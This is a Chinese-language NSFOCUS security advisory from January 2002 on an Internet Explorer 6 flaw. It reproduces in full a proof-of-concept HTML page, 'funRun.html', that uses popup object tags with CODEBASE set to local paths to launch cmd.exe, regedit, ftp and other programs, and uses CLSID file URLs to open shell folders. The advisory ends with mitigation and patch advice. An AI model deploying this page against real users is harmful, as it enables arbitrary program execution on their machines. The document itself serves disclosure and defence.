首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第28期->最新漏洞
期刊号: 类型: 关键词:
Microsoft IE执行任意程序漏洞

日期:2002-01-20

受影响的系统:  
Microsoft Internet Explorer 6.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000

不受影响系统:  

描述:
--------------------------------------------------------------------------------


BUGTRAQ  ID: 3867

Microsoft IE是Windows系统捆绑的,流行的Web浏览器。

Microsoft IE存在设计问题,可以使远程攻击者通过IE在主机上执行任意程序。

在2000年6月24日,http-equiv <http-equiv@excite.com>发布了一个IE的漏洞,允许恶意网站在浏览其网页的客户机上执行任意程序。通过在网页中嵌入一个对象,这个对象的CLASSID值为非0,CODEBASE的参数值指向客户机上的任何可执行程序,当用户浏览这个网页时,客户机上的程序就会执行。

虽然据信在以后版本的IE中修补了这个漏洞,但IE还是会受到这个漏洞的影响。当使用window.PoPup()或window.Open()调用创建一个新对象时,如果对象的CODEBASE值指向一个客户机上的可执行程序时,程序就会被执行。这个漏洞可能与http-equiv提到的漏洞相关的底层缺陷有联系。通过利用这个漏洞可以在客户机上执行任意程序,此漏洞被证实存在于IE 6.0,先前版本的IE也可能受此漏洞的影响。

<*来源:the Pull (osioniusx@yahoo.com)
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html
        http://home.austin.rr.com/wiredgoddess/thepull/advisory4.html
*>

测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



the Pull (osioniusx@yahoo.com)提供了如下测试代码:

funRun.html:

<HTML>
<HEAD>
<TITLE>Extensibility Page</TITLE>

<SCRIPT LANGUAGE="JScript">
//BELOW POPUP CODE
var oPopup = window.createPopup();

function openPopupCMD()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/cmd.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/cmd.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/explorer.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openRegedit()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/Regedit.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/regedit.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openCalc()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/calc.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/calc.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openFTP()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/FTP.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/FTP.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openPopupCleanMGR()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/cleanmgr.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/cleanmgr.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}


function openGames()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program Files/Plus!/PINBALL.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="C:/Program Files/Windows NT/Pinball/Pinball.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/MSHEARTS.EXE"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="C:/winnt/system32/winmine.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openPaint()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program Files/Accessories/mspaint.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/mspaint.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}



</SCRIPT>



<SCRIPT LANGUAGE="JScript">
//BELOW file://::{CLSID} code

function openControlPanel()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}");
}

function openFonts()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524152}");
}

function openAdminTools()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524153}");
}

function openDialUpNetworking()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{992CFFA0-F557-101A-88EC-00DD010CCC48}");
}

function openNetworkNeighborhood()
{
window.open("file:///::{208D2C60-3AEA-1069-A2D7-08002B30309D}");
}

function openTasks()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}");
}

function openRecycleBin()
{
window.open("file:///::{645FF040-5081-101B-9F08-00AA002F954E}");
}

function openMyDocuments()
{
window.open("file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/");
}

</SCRIPT>

</HEAD>
<BODY >
<h1>Internet Explorer Fun Run Page</h1>
<p>[For Internet Explorer 6 with updates q312361,q240308, and q313675, possibly
earlier versions.]</p>
<p> Click your mouse over the words below and have some fun seeing what remote website
authors can run on your system at their convenience. While this is amusing and startling,
with a few loops it could cause a bit of a catastrophe on your system. Combined with other
exploits: force fed trojans could be run; possibly command parameters run; or directory
traversal (client side) exploits.

I have included demonstrations here of the PopUp OBJECT tag bug as well as the
"directoryInfo" bug because they have similiar results and combine to paint an interesting
picture.
<BR>
Be sure and clean out your "Downloaded Program Files" directory when done.
<BR>
Note: File paths made for Windows 2000 and Windows ME.

</P>
<BR><BR>
Pop-Up Exploit Stuff - Click on the Words Below<BR>
_________________________________________
<p onclick = "openPopupCMD();"><U><FONT color="#3333FF">Command</FONT></U></p>
<p onclick = "openRegedit()"><U><FONT color="#3333FF">Regedit</FONT></U></p>
<p onclick = "openCalc()"><U><FONT color="#3333FF">Calculator</FONT></U></p>
<p onclick = "openFTP()"><U><FONT color="#3333FF">FTP</FONT></U></p>
<p onclick = "openPopupCleanMGR()"><U><FONT color="#3333FF">CleanManager</FONT></U></p>
<p onclick = "openGames()"><U><FONT color="#3333FF">Games</FONT></U></p>
<p onclick = "openPaint()"><U><FONT color="#3333FF">Paint</FONT></U></p>

File:{CLSID} Stuff - Click on the Words Below<BR>
_________________________________________
<p onclick = "openControlPanel()"><U><FONT color="#3333FF">Control Panel</FONT></U></p>
<p onclick = "openFonts()"><U><FONT color="#3333FF">Fonts</FONT></U></p>
<p onclick = "openAdminTools()"><U><FONT color="#3333FF">Admin Tools</FONT></U></p>
<p onclick = "openDialUpNetworking()"><U><FONT color="#3333FF">Dial Up Networking</FONT></U></p>
<p onclick = "openNetworkNeighborhood()"><U><FONT color="#3333FF">Network Neighborhood</FONT></U></p>
<p onclick = "openTasks()"><U><FONT color="#3333FF">Tasks</FONT></U></p>
<p onclick = "openRecycleBin()"><U><FONT color="#3333FF">Recycle Bin</FONT></U></p>
<p onclick = "openMyDocuments()"><U><FONT color="#3333FF">My Documents</FONT></U></p>


<BR><BR><BR>

</BODY>
</HTML>



--------------------------------------------------------------------------------
建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在IE中设置禁止活动脚本的执行:
  选择:“工具”->“Internet 选项...”->“安全”->“Internet”(或者其他区域,例如“本地Intranet”、“受信任的站点”)
  点击“自定义级别”,在“安全设置”中选择“脚本”->“活动脚本”,将其属性改为“禁用”,按“确定”保存设置。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

版权所有,未经许可,不得转载